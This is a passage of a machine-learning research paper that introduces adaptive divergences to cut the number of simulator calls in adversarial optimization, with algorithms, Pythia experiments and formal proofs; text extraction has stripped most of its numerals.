minf∈bl(fi− +f ,p,q); f ≡ ; where: ρ —learning rate, b —base estimator, c :z+→[ , ] —a strictly increasing function for mapping ensemble size onto α∈[ , ]. borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. although definition is quite general, in this paper, we focus on families of pseudo- divergence produced in a manner similar to the examples above. all these examples introduce a classification algorithm parameterized by α, then define pseudo-divergences dα by substituting the optimal discriminator in equation eq. ( ) with the discriminator trained in accordance with this classification algorithm with the parameter α. of course, one has to make sure that the resulting family of pseudo-divergences is ordered and complete w.r.t. jensen–shannon divergence. appendix provides formal definitions and proofs for the examples above. with this class of pseudo-divergences in mind, we refer to α as capacity of the pseudo- divergence dα ∈d relative to the family d, or simply as capacity if the family d is clear from the context. in the examples above, capacity of pseudo-divergence is directly linked to the capacity of underlying discriminator models: to the size of the model in equation eq. ( ), to the strength of the regularization in equation eq. ( ) (which, similar to the previous case, effectively restricts the size of the set of feasible models) or to the size of the ensemble for a boosting-based family of divergences in equation eq. ( ). finally, we introduce a function that combines a family of pseudo-divergences into a single divergence. definition if a family of pseudo-divergences d={dα|α∈[ , ]} is ordered and complete with respect to jensen–shannon divergence, then adaptive divergence add produced by d is defined as: add(p,q)= inf { dα(p,q)|dα(p,q)≥( −α)log } . ( ) we omit index in add when the family d is clear from the context or is not important. a linear ‘threshold’ function τ(α)= −α is used in the definition, however, it can be replaced by any strictly decreasing τ : [ , ]→[ , ], such that τ( )= and τ( )= : add(p,q)= inf { dα(p,q)|dα(p,q)≥τ(α)log } , ( ) but, since one can redefine the family d as d′={dτ(α)|α∈[ , ]}, this effectively leads to the same definition. nevertheless, it might be convenient in practice to use τ other than τ(α)= −α as most model families have a natural ordering, e.g., regularization strength. the coefficient log naturally arises as the maximal value of jensen–shannon divergence as well as an upper bound of any pseudo-divergence based on equation eq. ( ) if the function f (x)= / is included in the underlying classification model m. since almost all popular models are capable of learning constant estimators, log is included in the definition. nevertheless, to adopt definition for exotic models or divergences other than jensen–shannon (e.g., wasserstein distance), this coefficient (and, possibly, the ‘threshold’ function) should be reconsidered. note, that due to property (d ), dα(p,q) is a non-decreasing function of α, while ( −α)log is a strictly decreasing one. hence, if family d is such that for any two distributions p and q dα(p,q) is continuous w.r.t. α, equation eq. ( ) can be simplified: add(p,q)=dα∗(p,q), ( ) borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm general procedure for computing an adaptive divergence by grid search require: d={dα|α∈[ , ]}— ordered and complete w.r.t. jensen-shannon divergence family of pseudo-divergences; ε — tolerance; p, q — input distributions α← ; while dα(p,q)<( −α)log do α←α+ε end while return dα(p,q) where α∗ is the root of the following equation: dα(p,q)=( −α)log . ( ) a general procedure for computing add for this case is outlined in algorithm . intuitively, an adaptive divergence add switches between members of d depending on the ‘difficulty’ of separating p and q. for example, consider family d produced by equation eq. ( ) with a high-capacity neural network as model m and l regularization r on its weights. for a pair of distant p and q, even a highly regularized network is capable of achieving low cross-entropy loss and, therefore, add takes values of the pseudo-divergence based on such network. as distribution q moves close to p, add lowers the regularization coefficient, effectively increasing the capacity of the underlying model. the idea behind adaptive divergences can be viewed from a different angle. given two distributions p and q, it scans the producing family of pseudo-divergences, starting from α= (the least powerful pseudo-divergence), and if some pseudo-divergence reports high enough value, it serves as a ‘proof’ of differences between p and q. if all pseudo-divergences from the family d report , then p and q are equal almost everywhere as the family always includes jsd as a member. formally, this intuition can be expressed with the following theorem. theorem if add is an adaptive divergence produced by an ordered and complete with respect to jensen–shannon divergence family of pseudo-divergences d, then for any two distributions p and q: jsd(p,q)= if and only if ad(p,q)= . a formal proof of theorem can be found in appendix a . combined with the observation that ad(p,q)≥ regardless of p and q, the theorem states that ad is a divergence in the same sense as jsd. this, in turn, allows to use adaptive divergences as a replacement for jensen–shannon divergence in adversarial optimization. as can be seen from the definition, adaptive divergences are designed to utilize low- capacity pseudo-divergences (with underlying low-capacity models) whenever it is possible: for a pair of distant p and q one needs to train only a low-capacity model to estimate ad, using the most powerful model only to prove equality of distributions. as low-capacity models generally require fewer samples for training, ad allows an optimization algorithm to run for more iterations within the same time restrictions. properties of add highly depend on the family d, and choice of the latter might either negatively or positively impact convergence of a particular optimization algorithm. borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . . . . . . . . . . . . generator ground-truth a . . . . . . . rotation angle . . . . . . . di ve rg en ce jsd linear ad logarithmic ad b . . . . . . . rotation angle . . . . . . . . . di ve rg en ce jsd ad, dropout ad, l c generator ground-truth d . . . . . . . . rotation angle . . . . . . . . di ve rg en ce jsd linear ad logarithmic ad e . . . . . . . . rotation angle . . . . . . . . di ve rg en ce jsd ad, dropout ad, l f figure synthetic examples. (a) and (d): ground-truth distributions and example configurations of generators. both generators are rotated versions of the corresponding ground-truth distributions. (b) and (e): jsd—jensen–shannon divergences estimated by gradient boosted decision trees with trees of depth (b), trees of depth (e); linear ad and logarithmic ad—adaptive divergences based on the same models as jsd with linear and logarithmic capacity functions, dashed lines represent some pseudo- divergences from the families producing adaptive divergences. (c) and (f): jsd —jensen–shannon di- vergences estimated by fully-connected neural networks with one hidden layer with units (c) and units (f); ad, dropout and ad, l —adaptive divergences based on the same architectures as the one for jsd, with dropout and l regularizations; dashed lines represent some of the pseudo-divergences from the dropout-produced family. see ‘implementation’ for the implementation details. full-size doi: . /peerjcs. /fig- figure demonstrates both cases: here, we evaluate jsd and four variants of add on two synthetic examples. in each example, the generator produces a rotated version of the ground-truth distribution and is parameterized by the angle of rotation (ground-truth distributions and examples of generator distributions are shown in figs. a and d). in figs. b and c ad shows behavior similar to that of jsd (both being monotonous and maintaining a significant slope in the respective ranges). in fig. e, both variants of ad introduce an additional local minimum: as the rotation angle approaches π/ , marginal feature distributions become identical, which interferes with decision-tree-based algorithms (this is especially pronounced for ad with logarithmic capacity function as it prioritizes low-capacity models). this behavior is expected to impact convergence of gradient-based algorithms negatively. in contrast, in fig. f neural-network-based ad with l regularization stays monotonous in the range [ ,π/ ] and keeps a noticeable positive slope, in contrast to saturated jsd. the positive slope is expected to improve convergence of gradient-based algorithms and, possibly, some variants of bayesian optimization. in contrast, neural-network-based borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. technically, this function should be extended on [ ,+∞) to be in agreement with definition . note that introducing a continuous approximation of the ensemble by, for example, varying learning rate for the last base estimator in the current ensemble from to ρ, eliminates discontinuity of ad. ad with dropout regularization behaves in a manner similar to adaptive divergences in fig. e. the most likely explanation is that l regularization mostly changes magnitude of the predictions without significantly affecting the decision surface and, therefore, largely replicates behavior of jsd, while dropout effectively lowers the number of units in the network, which biases the decision surface towards a straight line (i.e., towards logistic regression). implementation a general algorithm for computing an adaptive divergence is presented in algorithm . this algorithm might be an expensive procedure as the algorithm probes multiple pseudo-divergences, and for each of these probes, generally, a model needs to be trained from scratch. however, two of the most commonly used machine learning models, boosting-based methods (friedman, ) and neural networks, allow for more efficient estimation algorithms due to the iterative nature of training procedures for such models. gradient boosted decision trees gradient boosted decision trees (friedman, ) (gbdt) and, generally, boosting- based methods, being ensemble methods, intrinsically produce an ordered and complete with respect to jensen–shannon divergence family of pseudo-divergences in the manner similar to equation eq. ( ). this allows for an efficient ad estimation procedure shown by algorithm . here, the number of base estimators serves as capacity of pseudo- divergences, and mapping to α∈[ , ] is defined through an increasing capacity function c :z+→[ , ]. in our experiments, for ensembles of maximal size n , we use the following capacity functions: linear capacity: c(i)=c i n ; ( ) logarithmic capacity: c(i)=c log(i+ ) log(n + ) . ( ) notice, however, that equation eq. ( ) defines a discrete variant of ad, which most certainly will result in a discontinuous function. this effect can be seen on fig. e. neural networks there is a number of ways to regulate the capacity of a neural network. one of the simplest options is to vary the total number of units in the network. this, however, would almost certainly result in a discontinuous adaptive divergence, similarly to gradient boosted decision trees (fig. e), which is not ideal even for black-box optimization procedures. in this work, we instead use well-established dropout regularization srivastava et al. ( ). effects of dropout are somewhat similar to varying number of units in a network, but at the same time dropout offers a continuous parametrization—it is clear that setting dropout probability p to results in an unregularized network, while p= effectively restricts classifier to a constant output and intermediate values of p produce models in between these extreme cases. to produce a family of pseudo-divergences we equip dropout borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm boosted adaptive divergence require: xp, xq — samples from distributions p and q, b — base estimator training al- gorithm, n — maximal size of the ensemble, c :z+→[ , ]— capacity function; ρ — learning rate; f ← / i← l ← log for i= ,...,n do if li >c(i)log then fi+ ←fi+ρ ·b(fi,xp,xq) li+ ←l(fi+ ,xp,xq) i← i+ else return log −li end if end for return log −ln regularization with a linear capacity function: c(α)= −α, where α corresponds to dropout probability p. methods with explicit regularization terms can also be used to produce a family of pseudo-divergences. in this work, we examine l regularization on network weights as one of the most widely used. in this case, a family of pseudo-divergences is defined by equation eq. ( ) with a logarithmic capacity function: c(α)=−log(α). regularization methods mentioned above were selected primarily due to their simplicity and popularity in the field. our experiments indicate that these methods perform well. nevertheless, further studies are required to determine best-performing regularization techniques. in our experiments, we observe that unregularized networks require significantly more samples to be properly trained than regularized ones. to reduce discriminator variance, we suggest to use additional regularization r, strength of which is independent from the capacity parameter α, e.g.: dα(p,q)= log −l(f (θ ∗ ,·),p,q); ( ) θ ∗ = arg minθ∈ l(f (θ,·),p,q)+c( −α)·r(θ)+r(θ). in this work, following louppe, hermans & cranmer ( ), we use gradient regularization r =r suggested by mescheder, geiger & nowozin ( ). note, that such family of pseudo-divergences is no longer complete w.r.t jensen–shannon divergence, i.e., d = jsd. nevertheless, d is still a proper divergence (mescheder, geiger & nowozin, ) (which closely resembles jsd), and all results in this work hold with respect to such divergences including main theorems and claims, i.e., the family defined above still produces a (generalized) variant of adaptive divergence. borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the proposed procedures for estimating ad is outlined in algorithms and . as chosen regularization methods result in families of pseudo-divergences continuous w.r.t α, the proposed algorithm employs equation eq. ( ), i.e., it varies the strength of the regularization depending on the current values of the cross-entropy. the values of the loss function are estimated with an exponential moving average over losses on mini-batches during iterations of stochastic gradient descent, with the idea that, for slowly changing loss estimations and small enough learning rate, network training should converge (liu, simonyan & yang, ). we find that initializing exponential moving average with log , which corresponds to the absent regularization, works best. algorithm adaptive divergence estimation by a dropout-regularized neural network require: xp, xq — samples from distributions p and q; fθ :x ×r→r — neural network with parameters θ ∈ , the second argument repre- sents dropout probability and is zero if unspecified; c — capacity function; ρ — exponential average coefficient; β — coefficient for r regularization; γ — learning rate of sgd. lacc← log while not converged do xp ←sample(xp) xq←sample(xq) ζ ←c ( − lacclog ) g ←∇θl(fθ(·,ζ),xp,xq) g ←∇θ‖∇θfθ(xp)‖ lacc←ρ ·lacc+( −ρ)·l(fθ,xp,xq) θ←θ−γ ( g +βg ) end while return log −l(fθ,xp,xq) experiments adaptive divergence was designed to require fewer samples than its conventional counterparts. however, for practical purposes, it is meaningless to consider this quantity outside the context of optimization. to illustrate this claim, consider the following divergence: id(p,q)= { , if p =q almost everywhere; , otherwise. such divergence can be estimated in a manner similar to that of adaptive divergence: starting with a low-capacity model, train the model to distinguish between p and q, if the model reports any differences between distributions, return , otherwise increase the borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. code of the experiments is available at https://github.com/hse-lambda/rapid- ao/ this procedure requires generating an additional validation set of the size similar to that of the training set, which might be avoided by, e.g., using bayesian inference, or cross-validation estimates. capacity of the model and repeat, until a sufficiently high capacity is reached, in which case return . in terms of the number of samples, id is expected to be more efficient than ad; at the same time, id is a textbook example of intrinsically hard optimization problem, rendering it useless for adversarial optimization. therefore, we judge the performance of adaptive divergence only within an optimization procedure. note that adaptive divergence is not expected to improve the optimization surface; nevertheless, as fig. demonstrates, the improvement is seemingly present in some instances; however, our experiments show that it does not play any significant role (see appendix a for details). in the cases, when degradation of the optimization surface takes place, global optimization procedures, such as bayesian optimization, are still expected to benefit from the usage of ad by being able to perform more steps within the same budget on the number of generator calls. we compare adaptive divergence against jsd on three tasks, each task is presented by a parametrized generator, ’real-world’ samples are drawn from the same generator with some nominal parameters. optimization algorithms are expected to converge to these nominal parameters. we evaluate the performance of adaptive divergences with two black-box optimization algorithms, namely bayesian optimization and adversarial variational optimization. as computational resources spent by simulators are of our primary concern, we measure convergence of adversarial optimization with respect to the number of samples generated by the simulation, which is expected to be roughly proportional to the total time in case of computationally heavy simulations. we chose to neglect the time spent on training models as the proposed methods are intended for simulations that are significantly more computationally intensive than training of any model with a reasonable capacity, for example, running atlas simulation (the atlas collaboration, ) for the same number of times as budgets in our experiments would require several years on a single-core cpu. to measure the number of samples required to estimate a divergence, we search for the minimal number of samples such that the difference between train and validation losses is within − for gradient boosted decision trees and · − for neural networks. as a significant number of samples is involved in loss estimation, for simplicity, we use point estimations of losses. for gbdt, we utilize a bisection root-finding routine to reduce time spent on retraining classifiers; however, for more computationally expensive simulators, it is advised to gradually increase the size of the training set until the criterion is met. for each experiment, we report convergence plots—euclidean distance from the current guess to the nominal parameters as a function of the number of examples generated by the simulator. as the performance of bayesian optimization is influenced by choice of the initial points (in our experiments, points uniformly drawn from the search space), each experiment involving bayesian optimization is repeated times, and aggregated results are reported. similarly, experiments with variational optimization are repeated times each. borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/hse-lambda/rapid-ao/ https://github.com/hse-lambda/rapid-ao/ https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm adaptive divergence estimation by a regularized neural network require: xp, xq — samples from distributions p and q; fθ :x →r — neural network with parameters θ∈ ; r : →r — regularization function; c — capacity function; ρ — exponential average coefficient; β — coefficient for r regularization; γ — learning rate of sgd. lacc← log while not converged do xp ←sample(xp) xq←sample(xq) ζ ←c ( − lacclog ) g ←∇θ [ l(fθ,xp,xq)+ζ ·r(fθ) ] g ←∇θ‖∇θfθ(xp)‖ lacc←ρ ·lacc+( −ρ)·l(fθ,xp,xq) θ←θ−γ ( g +βg ) end while return log −l(fθ,xp,xq) xor-like synthetic data this task repeats one of the synthetic examples presented in fig. d: ground truth distribution is an equal mixture of two gaussian distributions, the generator produces a rotated version of the ground-truth distribution with the angle of rotation being the single parameter of the generator. the main goal of this example is to demonstrate that, despite significant changes in the shape of the divergence, global optimization algorithms, like bayesian optimization, can still benefit from the fast estimation procedures offered by adaptive divergences. for this task, we use an adaptive divergence based on gradient boosted decision trees ( trees with the maximal depth of ) with linear and logarithmic capacity functions given by eqs. ( ) and ( ) and c = / . gaussian process bayesian optimization with matern kernel (ν= / and scaling from [ − , ] automatically adjusted by maximum likelihood fit) is employed as optimizer. convergence of the considered divergences is shown in fig. . as can be seen from the results, adaptive divergences tend to request fewer generator calls per estimation; and, given the same budget, both variants of adaptive divergence converge on parameters around an order of magnitude closer to the optimum than traditional jsd. notice, that the initial rapid progress slows as optimizer approaches the optimum, and the slope of the curves becomes similar to that of jsd: this can be explained by ad approaching jsd as probed distributions become less distinguishable from the ground-truth one. borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. note, that this task is rather a realistic toy example—in practical settings, pythia event generator is followed by a much more computationally expensive detector simulation such as geant (allison et al., ), the latter translates outcomes of an event generator, such as pythia, into observable values. for comparison, full atlas simulation (event generator and detector simulation) mentioned above takes several minutes per sample, while pythia alone typically require less than a second per event (milliseconds in our settings). number of generator calls eu cl id ea n di st an ce to th e so lu tio n jsd linear ad logarithmic ad a generator calls per optimization step . . . . . . fra ct io n of th e to ta l n um be r o f s te ps jsd linear ad logarithmic ad b figure xor-like synthetic example, gradient boosted decision trees. (a) convergence of bayesian optimization on: jensen–shannon divergence (marked as jsd), adaptive divergences with a linear capac- ity function (marked as linear ad), and a logarithmic capacity function (logarithmic ad). each experi- ment was repeated times; curves are interpolated, median curves are shown as solid lines, bands indi- cate th and th percentiles. (b) distribution of computational costs per single optimization step mea- sured by the number of generator calls requested for divergence estimation; each optimization step re- quires exactly one divergence estimation; note logarithmic scaling of the x-axis. full-size doi: . /peerjcs. /fig- pythia hyper-parameter tuning this task is introduced by ilten, williams & yang ( ) and involves tuning hyper- parameters of the pythia event generator, a high-energy particle collision simulation used at cern. for this task, electron-positron collisions are simulated at a center-of-mass energy . gev. as initial electron and positron collide and annihilate, new particles are created, some of which are unstable and might decay into more stable particles. a collision event is described by the properties of the final (stable) products. this process is intrinsically stochastic (due to the laws of physics) and covers a large space of possible outcomes, moreover, even with relatively large changes in generator’s hyper-parameters, outcome distributions overlap significantly, which makes it an excellent example for adversarial optimization. the nominal parameters of the pythia event generator are set to the values of the monash tune (skands, carrazza & rojo, ). in work by ilten, williams & yang ( ), various physics-motivated statistics of events are used as observables, with a total of more than features. the same statistics were originally used to obtain the monash tune. for the purposes of the experiment, we consider one hyper-parameter, namely alphasvalue, with the nominal value of . and search range [ . , . ]. we repeat settings of the experiment described by ilten, williams & yang ( ). we employ gradient boosting over oblivious decision trees (catboost implementation by prokhorenkova et al., ) with trees of depth and other parameters set to their default values. we use gaussian process bayesian optimization with matern kernel (ν= / and borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. methods proposed by ilten, williams & yang ( ) compare a fixed set of statistics computed over multiple examples. as adversarial methods operate with individual examples, we use the same statistics computed for single events, i.e., original data can be recovered from ours by simply averaging across events. number of generator calls eu cl id ea n di st an ce to th e so lu tio n jsd linear ad logarithmic ad a generator calls per optimization step . . . . . . fra ct io n of th e to ta l n um be r o f s te ps jsd linear ad logarithmic ad b figure pythia hyper-parameter tuning, catboost. (a) convergence of bayesian optimization on: jensen–shannon divergence (marked as jsd), adaptive divergences with a linear capacity function (marked as linear ad), and a logarithmic capacity function (logarithmic ad). each experiment was repeated times, curves are interpolated, median curves are shown as solid lines, bands indicate th and th percentiles. (b) distribution of computational costs per single optimization step measured by the number of generator calls requested for divergence estimation; each optimization step requires exactly one divergence estimation; note logarithmic scaling of the x-axis. full-size doi: . /peerjcs. /fig- scaling from [ − , ] automatically adjusted by maximum likelihood fit) as optimizer. comparison of unmodified jensen–shannon divergence with adaptive divergences with linear and logarithmic capacity functions (defined by eqs. ( ) and ( ) and c = / ) presented onfig. . results, shown in fig. , indicate that, given the same budget, bayesian optimization over adaptive divergences yields solutions about an order of magnitude closer to the nominal value than jensen–shannon divergence. this acceleration can be attributed to the proposed estimation procedures that require far fewer generator calls than jsd. additionally, notice that the slope of the convergence curves for ad gradually approaches that of ad as the proposal distributions become closer to the ground-truth one. pythia alignment in order to test the performance of adaptive divergences with adversarial variational optimization, we repeat the pythia-alignment experiment suggested by louppe, hermans & cranmer ( ). the settings of this experiment are similar to the previous one. in this experiment, however, instead of collecting physics-motivated statistics, we consider a simplified detector simulation, represented by a × spherical grid with cells uniformly distributed in pseudorapidity ν∈[− , ] and azimuthal angle φ∈[−π,π] space. each cell of the detector records the energy of particles passing through it. the detector has parameters: x,y,z-offsets of the detector center relative to the collision point, where z-axis is placed along the beam axis, the nominal offsets are zero, and the initial borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. a b c d e f g h figure illustration of the pythia-alignment task. (a) aggregated events for zero offset (the nomi- nal configuration), . offset along x-axis (b), y-axis (c), and z-axis (d). (e–h) single-event examples from the corresponding configurations above—each activated pixel indicate a particle or multiple particles passing trough the corresponding region of the detector. full-size doi: . /peerjcs. /fig- guess is ( . , . , . ). figure shows averaged detector responses for the example configurations and samples from each of these configurations. for this task, a -hidden-layer neural network with hidden units and relu activation function is employed. r regularization, proposed by mescheder, geiger & nowozin ( ), with the coefficient , is used for the proposed divergences and the baseline. adam optimization algorithm (kingma & ba, ) with learning rate − is used to perform updates of the search distribution. we compare the performance of two variants of adaptive divergence (dropout and l regularization) described in ‘implementation’. results are shown in fig. . adaptive divergences require considerably fewer samples for their estimation than the baseline divergence with only r regularization, which, given the same budget, allows both variants of adaptive divergence to accelerate adversarial optimization significantly. note that the acceleration is even more pronounced in comparison to jsd estimated by an unregularized network: in our experiments, to achieve the set level of agreement between train and test losses, the unregularized network often requires more samples than the entire budget. discussion to the best knowledge of the authors, this work is the first one that explicitly addresses computational costs of adversarial optimization for expensive generators. interestingly, several recent developments, like progressive gan (karras et al., ) and chaingan (hossain et al., ), use multiple discriminators of increasing capacity; however, this is done mainly to compensate for the growing capacity of the generators and, probably, not for reducing computational costs. borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. number of generator calls × × × × eu cl id ea n di st an ce to th e so lu tio n jsd ad, dropout ad, l a generator calls per optimization step . . . . . . fra ct io n of th e to ta l n um be r o f s te ps jsd ad, dropout ad, l b figure pythia-alignment, neural networks. (a) convergence of adversarial variational optimization on: adaptive divergence produced by l regularization (ad, l ), dropout regularization (ad, dropout), and the baseline divergence with constant r regularization (marked as jsd). each experiment was repeated times, curves are interpolated, median curves are shown by solid lines, bands indicate th and th per- centiles; steps-like patterns are interpolation artifacts. (b) distribution of computational costs per single optimization step measured by the number of generator calls requested for divergence estimation; each optimization step requires exactly one divergence estimation; note logarithmic scaling of the x-axis. full-size doi: . /peerjcs. /fig- several recent papers propose improving stability of adversarial optimization by employing divergences other than jensen–shannon (gulrajani et al., ; arjovsky, chintala & bottou, ; bellemare et al., ). note that all results in this paper also hold for any divergence that can be formulated as an optimization problem, including wasserstein (arjovsky, chintala & bottou, ) and cramer (bellemare et al., ) distances. it can be demonstrated by adjusting definition and repeating the proof of theorem for a new divergence; presented algorithms also require only minor adjustments. multiple works introduce regularization (sønderby et al., ; arjovsky, chintala & bottou, ; roth et al. ; kodali et al., ; mescheder, geiger & nowozin, ) for improving stability and convergence of adversarial optimization. most of the standard regularization methods can be used to regulate model capacity in adaptive divergences. also, one can use these regularization methods in addition to adaptive divergence as any discriminator-based regularization effectively produces a new type of divergence. pythia-alignment experiment (‘pythia alignment’) demonstrates it clearly, where we use r regularization with constant coefficient in addition to varying-strength dropout and l regularization. as we discussed in ‘adaptive divergence’, properties of adaptive divergences highly depend on the underlying families of pseudo-divergences; the impact of various regularization schemes is a subject of future research. borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. conclusion in this work, we introduce adaptive divergences, a family of divergences meant as an alternative to jensen–shannon divergence for adversarial optimization. adaptive divergences generally require smaller sample sizes for estimation, which allows for a significant acceleration of adversarial optimization algorithms. these benefits were demonstrated on two fine-tuning problems involving pythia event generator and two of the most popular black-box optimization algorithms: bayesian optimization and variational optimization. experiments show that, given the same budget, adaptive divergences yield results up to an order of magnitude closer to the optimum than jensen–shannon divergence. note, that while we consider physics-related simulations, adaptive divergences can be applied to any stochastic simulation. theoretical results presented in this work also hold for divergences other than jensen– shannon divergence. acknowledgements we wish to thank mikhail hushchyn, denis derkach, and marceline ivanovna for useful discussions and suggestions on the text. appendix a : formal definitions and proofs definition a model family m={mα⊆f|α∈[ , ]} is complete and nested, if: (n ) (x → / )∈m ; (n )] m =f; (n ) ∀α,β∈[ , ] :(α<β)⇒(mα⊂mβ). theorem if a model family m={mα ⊆f|α∈[ , ]} is complete and nested, then the family d={dα : (x)× (x)→r|α∈[ , ]}, where: dα(p,q)= log − inf f∈mα l(f ,p,q), ( ) is a complete and ordered with respect to jensen–shannon divergence family of pseudo- divergences. proof let’s introduce function f (x)= / . now we prove the theorem by proving that the family satisfies all properties from definition . property (d ) due to properties (n ) and (n ), f is a member of each set mα. this implies, that dα(p,q)≥ for all α∈[ , ]. for p =q, cross-entropy loss function l(f ,p,q) achieves its minimum in f = f , therefore, dα(p,q)= if p =q for all α∈[ , ]. therefore, for each α∈[ , ] dα is a pseudo-divergence. property (d ) from properties (n ) follows, that for all ≤α<β≤ : dα(p,q)= log − inf f∈mα l(f ,p,q)≥ log − inf f∈mβ l(f ,p,q)=dβ(p,q). borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. property (d ) this property is directly follows from property (n ) and equation eq. ( ). definition if m is a parameterized model family m ={f (θ,·) :x →[ , ]| θ∈ }, then a function r : →r is a proper regularizer for the family m if: (r ) ∀θ∈ :r(θ)≥ ; (r ) ∃θ ∈ : ( f (θ,·)≡ ) ∧(r(θ)= ). theorem if m is a parameterized model family: m ={f (θ,·)|θ ∈ }and m =f, r : →r is a proper regularizer for m , and c : [ , ]→[ ,+∞) is a strictly increasing function such, that c( )= , then the family d={dα : (x)× (x)→r|α∈[ , ]}: dα(p,q) = log − min θ∈ α(p,q) l(f (θ,·),p,q); α(p,q) = arg minθ∈ l r α(θ,p,q); lrα(θ,p,q)=l(f (θ,·),p,q)+c( −α)r(θ); is a complete and ordered with respect to jensen–shannon divergence family of pseudo- divergences. proof we prove the theorem by showing that the family d satisfies all properties from definition . property (d ) due to properties (r ), there exists suchθ , that f (θ ,·)≡ / and r(θ )= . notice, that, for all p and q, lrα(θ ,p,q)= log and l r α(θ,p,q)≥l(f (θ,·),p,q), therefore, dα(p,q)≥ for all p,q∈ (x) and for all α∈[ , ]. for the case p =q, θ also delivers minimum to l(f (θ ,·),p,q)+c( −α)r(θ ), thus, dα(p,q)= if p =q. this proves dα to be a pseudo-divergence for all α∈[ , ]. property (d ) let’s assume that ≤α < β ≤ , yet, for some p and q, dα(p,q) > dβ(p,q). the latter implies, that: min θ∈ α l(f (θ,·),p,q)< min θ∈ β l(f (θ,·),p,q); ( ) where: α= α(p,q) and β = β(p,q). let us pick some model parameters: θα ∈arg minθ∈ αl(f (θ,·),p,q); θβ ∈arg minθ∈ βl(f (θ,·),p,q). since θβ ∈ β, then, by the definition of β(p,q): lrβ(θβ,p,q)≤l r β(θα,p,q). ( ) from the latter and assumption (eq. ) follows, that r(θβ)<r(θα). by the conditions of the theorem, c =c( −α)−c( −β)> and: c ·r(θβ)<c ·r(θα). ( ) adding inequality eq. ( ) to inequality eq. ( ): lrα(θβ,p,q)<l r α(θα,p,q), which contradicts the definition of θα. this, in turn, implies that the assumption eq. ( ) contradicts conditions of the theorem. property (d ) since c( )= and m =f, d = jsd by the definition. borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. appendix a . proof of theorem theorem if addis an adaptive divergence produced by a complete and ordered with respect to jensen–shannon divergence family of pseudo-divergences d, then for any two distributions p and q: jsd(p,q)= if and only if ad(p,q)= . proof for convenience, we repeat the definition of an adaptive divergence add here: add(p,q)= inf { dα(p,q)|dα(p,q)≥( −α)log } . ( ) firstly, we prove that from jsd(p,q)= follows add(p,q)= . due to property (d ), d (p,q)= jsd(p,q)= , therefore, ∀α∈[ , ] :dα(p,q)= due to properties (d ) (pseudo-divergences form a non-decreasing sequence) and (p ) (non-negativity of pseudo-divergences), which, in turn, implies that ad(p,q)= inf{ }= . secondly, we prove that from add(p,q)= follows jsd(p,q)= . let’s assume that, for some p and q, ad(p,q)= , but jsd(p,q)=c > . let us define the set of active capacities ad(p,q) as follows: ad(p,q)= { α|dα(p,q)≥( −α)log } . ( ) note, that for every proper family d and for every pair of p and q: { }⊆ad(p,q) and, if α∈ad(p,q) then [α, ]⊆ad(p,q). the latter follows from property (d ) (pseudo-divergences form a non-decreasing sequence) and the fact, that ( −α)log is a strictly decreasing function.the previous statement implies that there are three possible forms of ad(p,q): . a single point: ad(p,q)={ }; . an interval: ad(p,q)=[β, ]; . a half-open interval: ad(p,q)=(β, ]; for some β∈[ , ). the first case would contradict our assumptions, since add(p,q)= inf{d (p,q)}= c > . to address the last two cases, note, that ∀α ∈ ad(p,q) : dα(p,q)≥ ( −β)log > due to the definition of ad(p,q). however, this implies that add(p,q)= inf{dα(p,q)|α∈ad(p,q)}≥( −β)log > , which contradicts our assumptions.from the statements above, we can conclude that if add(p,q)= , then jsd(p,q)= . combined with the previouly proven (jsd(p,q)= )⇒(add(p,q)= ), this finishes the proof. appendix a . source of the acceleration figures , and demonstrate that usage of adaptive divergence allows to accelerate adversarial optimization and lower requirements on the number of generator calls clearly play a major role. nevertheless, this acceleration can be potentially attributed to the changes in the shape of the target function. figure shows convergence plots for the experiments described above; however, the x-axis corresponds to the optimization step rather than number of generator calls. these convergence plots demonstrate that changes in shape either do not affect convergence speed (figs. a and b) or have a negative impact (fig. c). borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . . . . . . optimization step eu cl id ea n di st an ce to th e so lu tio n jsd linear ad logarithmic ad a optimization step eu cl id ea n di st an ce to th e so lu tio n jsd linear ad logarithmic ad b optimization step × × × × eu cl id ea n di st an ce to th e so lu tio n jsd ad, dropout ad, l c figure convergence plots as functions of optimization step: (a) xor-like synthetic dataset, (b) pythia hyper-parameter tuning, (c) pythia alignment. curves are interpolated, median curves are shown as solid lines, bars indicate th and th percentiles. for visual clarity curves are interpolated/extrapo- lated up to the median total number of steps for the corresponding method. full-size doi: . /peerjcs. /fig- additional information and declarations funding the research leading to these results has received funding from russian science foundation under grant agreement n - - . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: russian science foundation: - - . competing interests the authors declare there are no competing interests. author contributions • maxim borisyak conceived and designed the experiments, performed the experiments, 